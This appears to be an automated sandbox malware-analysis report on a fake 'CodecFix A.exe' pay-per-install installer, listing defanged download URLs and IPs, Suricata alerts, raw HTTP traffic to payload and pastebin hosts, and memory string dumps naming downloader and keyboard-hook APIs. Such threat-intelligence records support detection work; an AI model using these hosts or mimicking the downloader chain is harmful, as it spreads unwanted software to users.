hxxp://up2.dfiledownload28.space/h_redir.php?offer_id=4&aff_id=1082&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35572117&instId=814&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.88.21.193
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1082&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35572117&instId=814&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.76.4.236
hxxp://up2.dfiledownload28.space/offer.php?affId=1082&trackingId=35572117&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.88.21.193
hxxp://up2.dfiledownload28.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.88.21.193
hxxp://up.afiledownload27.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 52.85.173.195
hxxp://up2.dfiledownload28.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1671&id[]=1672&id[]=1673&id[]=1674&id[]=1675&id[]=1676&id[]=1677&id[]=1678&id[]=1679&id[]=1680&id[]=1681&id[]=1682&id[]=1683&id[]=1684&id[]=1685&id[]=1686&id[]=1358&id[]=1359&id[]=1364&id[]=1365 54.88.21.193


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /dl/8oGAY/CodecFix A.exe HTTP/1.1
Accept: */*
User-Agent: Setup Factory 8.0
Host: a7.alfafile.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Apr 2016 01:15:53 GMT
Content-Type: application/octet-stream
Content-Length: 8182398
Last-Modified: Thu, 21 Apr 2016 00:18:14 GMT
Connection: keep-alive
Content-Disposition: attachment; filename="CodecFix A.exe"
ETag: "57181c46-7cda7e"
Strict-Transport-Security: max-age=604800
Accept-Ranges: bytes

<<< skipped >>>

GET /raw/NgVcEX79 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 8.0
Host: pastebin.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 21 Apr 2016 01:15:52 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=de8fb70691355d9fe520cc2b8e1dc86eb1461201352; expires=Fri, 21-Apr-17 01:15:52 GMT; path=/; domain=.pastebin.com; HttpOnly
X-Powered-By: PHP/5.5.5
Cache-Control: public, max-age=1801
Vary: Accept-Encoding
CF-Cache-Status: MISS
Expires: Thu, 21 Apr 2016 01:45:53 GMT
Server: cloudflare-nginx
CF-RAY: 296cfcc4a80e16be-ARN
2c..1ilzxoa5UW4pSE9/XRZg KkD2Ytbuth4DmZa8Yio1uk=..0..


GET hXXp://up2.dfiledownload28.space/offer.php?affId=1082&trackingId=35572117&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 21 Apr 2016 01:15:51 GMT
Connection: close
Content-Length: 76840

<<< skipped >>>

GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1082&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35572117&instId=814&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 21 Apr 2016 01:16:03 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up2.dfiledownload28.space/offer.php?affId=1082&trackingId=35572117&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02544-102b93fbc4847dead74b4d0e4663e0-1082-4-0-0-0-0-UA-0-383134-5049415032-30-30-30-31323032353637343035-194.242.96.218-20160420211603-_-2E3C67183E15163661362051461909457C5E4C7B09581D605A5047076C777D6218133009727A794E51; expires=Sat, 21 May 2016 01:16:03 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Sat, 16 Mar 2019 11:56:03 GMT; path=/;
tracking_id: 102b93fbc4847dead74b4d0e4663e0
X-Robots-Tag: noindex, nofollow
Content-Length: 440
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://up2.dfiledownload28.space/offer.php?affId=1082&trackingId=35572117&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a>.</p>.</body></html>...

<<< skipped >>>

POST hXXp://up.afiledownload27.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.afiledownload27.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded

cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1671&id[]=1672&id[]=1673&id[]=1674&id[]=1675&id[]=1676&id[]=1677&id[]=1678&id[]=1679&id[]=1680&id[]=1681&id[]=1682&id[]=1683&id[]=1684&id[]=1685&id[]=1686&id[]=1358&id[]=1359&id[]=1364&id[]=1365


HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Thu, 21 Apr 2016 01:16:05 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 0991a4b934302d120a32dada6513dc35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: rrfR8jt3yP_bd6XLMxeou5M4AZYqycfZSE13ltvUZB3uikBNk2HT5g==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<TITLE>ERROR: The request could not be satisfied</TITLE>.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The request could not be satisfied.</H2>.<HR noshade size="1px">.This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests..<BR clear="all">.<HR noshade size="1px">.<PRE>.Generated by cloudfront (CloudFront).Request ID: rrfR8jt3yP_bd6XLMxeou5M4AZYqycfZSE13ltvUZB3uikBNk2HT5g==.</PRE>.<ADDRESS>.</ADDRESS>.</BODY></HTML>..


GET hXXp://up2.dfiledownload28.space/h_redir.php?offer_id=4&aff_id=1082&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35572117&instId=814&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1082&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35572117&instId=814&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 21 Apr 2016 01:15:49 GMT
Connection: close
Content-Length: 592
<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1082&source=814&aff_sub=PIAP2&aff_sub2=0&aff_sub3=0&aff_sub4=0&aff_sub5=1202567405&url=http://up2.dfiledownload28.space/offer.php?affId={aff_id}&trackingId=35572117&instId=814&ho_trackingid={transaction_id}&cc%3D{country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db%3D&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a></body>..


POST hXXp://up2.dfiledownload28.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded

cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1671&id[]=1672&id[]=1673&id[]=1674&id[]=1675&id[]=1676&id[]=1677&id[]=1678&id[]=1679&id[]=1680&id[]=1681&id[]=1682&id[]=1683&id[]=1684&id[]=1685&id[]=1686&id[]=1358&id[]=1359&id[]=1364&id[]=1365


HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 21 Apr 2016 01:15:52 GMT
Connection: close
Content-Length: 344
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Length Required</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>..<BODY><h2>Length Required</h2>..<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>..</BODY></HTML>....


GET hXXp://up2.dfiledownload28.space/installer.php?affId=1082&instId=814&ho_trackingid=102b93fbc4847dead74b4d0e4663e0&trackingId=35572117&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1671&id[]=1672&id[]=1673&id[]=1674&id[]=1675&id[]=1676&id[]=1677&id[]=1678&id[]=1679&id[]=1680&id[]=1681&id[]=1682&id[]=1683&id[]=1684&id[]=1685&id[]=1686&id[]=1358&id[]=1359&id[]=1364&id[]=1365 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 21 Apr 2016 01:15:53 GMT
Connection: close
Content-Length: 493096

<<< skipped >>>

GET /file/NFUG HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 8.0
Host: alfafile.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 21 Apr 2016 01:15:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://a7.alfafile.net/dl/8oGAY/CodecFix A.exe
Set-Cookie: pref=LQbK7DKMTF2CYklmnxBC7SJVdqs2mv8SHWl4FIiIkRA=|271384043471a7f661e7ce4647a07d7f; expires=Thu, 21-Apr-2016 02:15:52 GMT; Max-Age=3600; path=/payment
Set-Cookie: lang=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/file/NFUG
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
0..


The Trojan connects to the servers at the following location(s):

irsetup.exe_484:

Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
IDCT output block size %d not supported
Invalid component ID %d in SOS
Bogus message code %d
Found bad IPTC data resource (len exceeds block end). ID=%d
ExifInteroperabilityOffset
InteroperabilityVersion
InteroperabilityIndex
AsShotPreProfileMatrix
AsShotICCProfile
AsShotWhiteXY
AsShotNeutral
InteroperabilityIFDOffset
Internal error, unknown tag 0x%x
Tag %d
Compression algorithm does not support random access
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
%s: Cannot determine size of unknown tag type %d
%s: TIFF directory is missing required "%s" field
incorrect count for field "%s" (%u, expecting %u); tag trimmed
incorrect count for field "%s" (%u, expecting %u); tag ignored
%s: Can not read TIFF directory
%s: Can not read TIFF directory count
%s: Seek error accessing TIFF directory
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %u)
unexpected count for field "%s", %u, expected 2; ignored
cannot read TIFF_ANY type %d for field "%s"
Cannot handle different per-sample values for field "%s"
%s: cannot handle zero strip size
%s: cannot handle zero tile size
%s: cannot handle zero scanline size
%s: Wrong "%s" field, ignoring and calculating from imagelength
%s: Bogus "%s" field, ignoring and calculating from imagelength
%s: TIFF directory is missing required "%s" field, calculating from imagelength
%s: cannot handle zero number of %s
%s: wrong data type %d for "%s"; tag ignored
Registering anonymous field with tag %d (0x%x) failed
%s: unknown field with tag %d (0x%x) encountered
%s: invalid TIFF directory; tags are not sorted in ascending order
%s: Failed to read directory at offset %u
Unknown zTXt compression type %d
Incomplete compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
deflate 1.2.3 Copyright 1995-2003 Jean-loup Gailly
%ld%c
%s compression support is not configured
inflate 1.2.3 Copyright 1995-2005 Mark Adler
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
?%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogLuv
Inappropriate photometric interpretation %d for SGILog compression; %s
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for LogLuv state block
?PixarLog compression can't handle bits depth/data format combination (depth: %d)
%d bit input not supported in PixarLog
PixarLogDecode: unsupported bits/sample: %d
%s: stride %d is not a multiple of sample count, %d, data truncated.
%s: zlib error: %s
%s: Not enough data at scanline %d (short %d bytes)
%s: Decoding error at scanline %d, %s
PixarLog compression can't handle %d bit linear encodings
A%s: Encoder error: %s
%s: Bad code word at line %u of %s %u (x %u)
%s: Uncompressed data (not supported) at line %u of %s %u (x %u)
%s: %s at line %u of %s %u (got %u, expected %u)
%s: Premature EOF at line %u of %s %u (x %u)
%s: No space for Group 3/4 reference line
@ Fax DCS: %s
Fax SubAddress: %s
(%u = 0x%x)
%sEOL padding
%s2-d encoding
%suncompressed data
%s: No space for state block
JpegRestartInterval: %u
JpegProc: %u
OJPEG encoding not supported; use new-style JPEG compression instead
Unknown marker type %d in JPEG data
Subsampling values [%d,%d] are not allowed in TIFF
Subsampling inside JPEG data does not match subsampling tag values [%d,%d] (nor any other values allowed in TIFF); assuming subsampling inside JPEG data is correct and desubsampling inside JPEG decompression
Subsampling inside JPEG data [%d,%d] does not match subsampling tag values [%d,%d]; assuming subsampling inside JPEG data is correct
Subsampling tag is not set, yet subsampling inside JPEG data [%d,%d] does not match default values [2,2]; assuming subsampling inside JPEG data is correct
SamplesPerPixel %d not supported for this compression scheme
JPEG strip/tile size exceeds expected dimensions, expected %dx%d, got %dx%d
Decompressor will try reading with sampling %d,%d.
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d.
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecode: Not enough data at scanline %d (short %ld bytes)
LZWDecode: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecode: Corrupted LZW table at scanline %d
LZWDecode: Strip %d not terminated with EOI code
LZWDecodeCompat: Corrupted LZW table at scanline %d
LZWDecodeCompat: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %ld bytes)
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
Floating point "Predictor" not supported with %d data format
"Predictor" value %d not supported
Out of memory allocating %d byte temp buffer.
%u (0x%x)
WindowsForms
NTDLL.DLL
COMCTL32.DLL
USER32.DLL
MSCTF.DLL
GDI32.DLL
SHLWAPI.DLL
UXTHEME.DLL
API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0.DLL
LEFTPRESSED
ALWAYSSHOWSIZINGBAR
MSGBOXFONT
%[^,], %ld, %s
User32.dll
msimg32.dll
windows-1254
windows-874
SUBLANG_PORTUGUESE_BRAZILIAN
Portuguese (Brazil)
SUBLANG_PORTUGUESE
LANG_PORTUGUESE
Portuguese (Portugal)
windows-1255
windows-1257
windows-1253
windows-1252
windows-1250
windows-1256
windows-1251
1.2.40
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
WININET.dll
?#%X.y
InternetCrackUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
.?AVCCmdTarget@@
.PAVCException@@
.PAVCFileException@@
.PAVCMemoryException@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCISImageEx@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDVCRect@@AAV3@@@
.?AVCMainWindowSettings@@
.?AVCMD5@@
.?AVCPasswordData@@
.?AVCRTSessionVarMgr@@
.?AVCScreenCrtrMeasure@@
.?AVCWebBrowser2@@
.PAVCInternetException@@
.PAVCResourceException@@
.?AVCScreenCtrlMsg@@
.?AVCScreenCtrlMsgDetail@@
.PAVCThreadException@IR@@
.PAVCObject@@
.PAVCOleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCArchiveException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.PAVCOleDispatchException@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0\irsetup.exe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegEnumKeyA
RegEnumKeyExA
RegQueryInfoKeyA
RegDeleteKeyA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteExA
ShellExecuteA
UrlUnescapeA
URLDownloadToFileA
MapVirtualKeyExA
GetKeyboardState
GetKeyboardLayout
MapVirtualKeyA
GetKeyNameTextA
SetWindowsHookExA
UnhookWindowsHookEx
CreateDialogIndirectParamA
GetKeyState
ExitWindowsEx
EnumWindows
MsgWaitForMultipleObjects
GetAsyncKeyState
|5#" " " 
# # #""%"$
^)1-"*"<.
2;%SK
%.Fh3>$]R
]<%XZ
WEBI
]>2?>2/"
H%FZW
|@@@@8>-
\ ,%X
[9<;.MK31?MM&
!3-%#;3&1
##0#3131%& 
.QICN,1#-#5<## @I3>##Jl;>C3I=I6lIC6&-4-350T-3]
$&%f#F>#
:0@033*00
$,0($,$4
(,,4,4,$
0488<<<( 0
.text
`.rdata
@.data
.rsrc
@.reloc
%xERRj3cqZQ
! !!####0
;;;9551%%0
! !!565665@
version="9.5.0.0"
name="setup.exe"/>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
<!-- Windows Vista Support -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 Support -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 Support -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 Support -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 Support -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
ADVAPI32.dll
COMCTL32.dll
COMDLG32.dll
GDI32.dll
gdiplus.dll
imagehlp.dll
IMM32.dll
MSIMG32.dll
NETAPI32.dll
OLEACC.dll
OLEAUT32.dll
oledlg.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
USER32.dll
VERSION.dll
WINMM.dll
WINSPOOL.DRV
accKeyboardShortcut
hhctrl.ocx
VWININET.DLL
dwmapi.dll
xUxTheme.dll
yDWrite.dll
D2D1.dll
SHELL32.DLL
ZRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
aero.msstyles
winxp.royale.cjstyles
royale.msstyles
winxp.luna.cjstyles
luna.msstyles
Argument %d must be of type %s.
%d arguments required.
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
9.5.0.0
2015 Indigo Rose Corporation (VVV.indigorose.com)
suf_rt.exe

irsetup.exe_484_rwx_00401000_003DD000:

%s: No space for LogLuv state block
?PixarLog compression can't handle bits depth/data format combination (depth: %d)
%d bit input not supported in PixarLog
PixarLogDecode: unsupported bits/sample: %d
%s: stride %d is not a multiple of sample count, %d, data truncated.
%s: zlib error: %s
%s: Not enough data at scanline %d (short %d bytes)
%s: Decoding error at scanline %d, %s
PixarLog compression can't handle %d bit linear encodings
A%s: Encoder error: %s
%s: Bad code word at line %u of %s %u (x %u)
%s: Uncompressed data (not supported) at line %u of %s %u (x %u)
%s: %s at line %u of %s %u (got %u, expected %u)
%s: Premature EOF at line %u of %s %u (x %u)
%s: No space for Group 3/4 reference line
@ Fax DCS: %s
Fax SubAddress: %s
(%u = 0x%x)
%sEOL padding
%s2-d encoding
%suncompressed data
%s: No space for state block
JpegRestartInterval: %u
JpegProc: %u
OJPEG encoding not supported; use new-style JPEG compression instead
Unknown marker type %d in JPEG data
Subsampling values [%d,%d] are not allowed in TIFF
Subsampling inside JPEG data does not match subsampling tag values [%d,%d] (nor any other values allowed in TIFF); assuming subsampling inside JPEG data is correct and desubsampling inside JPEG decompression
Subsampling inside JPEG data [%d,%d] does not match subsampling tag values [%d,%d]; assuming subsampling inside JPEG data is correct
Subsampling tag is not set, yet subsampling inside JPEG data [%d,%d] does not match default values [2,2]; assuming subsampling inside JPEG data is correct
SamplesPerPixel %d not supported for this compression scheme
JPEG strip/tile size exceeds expected dimensions, expected %dx%d, got %dx%d
Decompressor will try reading with sampling %d,%d.
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d.
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecode: Not enough data at scanline %d (short %ld bytes)
LZWDecode: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecode: Corrupted LZW table at scanline %d
LZWDecode: Strip %d not terminated with EOI code
LZWDecodeCompat: Corrupted LZW table at scanline %d
LZWDecodeCompat: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %ld bytes)
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
Floating point "Predictor" not supported with %d data format
"Predictor" value %d not supported
Out of memory allocating %d byte temp buffer.
%u (0x%x)
WindowsForms
NTDLL.DLL
COMCTL32.DLL
USER32.DLL
MSCTF.DLL
GDI32.DLL
SHLWAPI.DLL
UXTHEME.DLL
API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0.DLL
LEFTPRESSED
ALWAYSSHOWSIZINGBAR
MSGBOXFONT
%[^,], %ld, %s
User32.dll
msimg32.dll
windows-1254
windows-874
SUBLANG_PORTUGUESE_BRAZILIAN
Portuguese (Brazil)
SUBLANG_PORTUGUESE
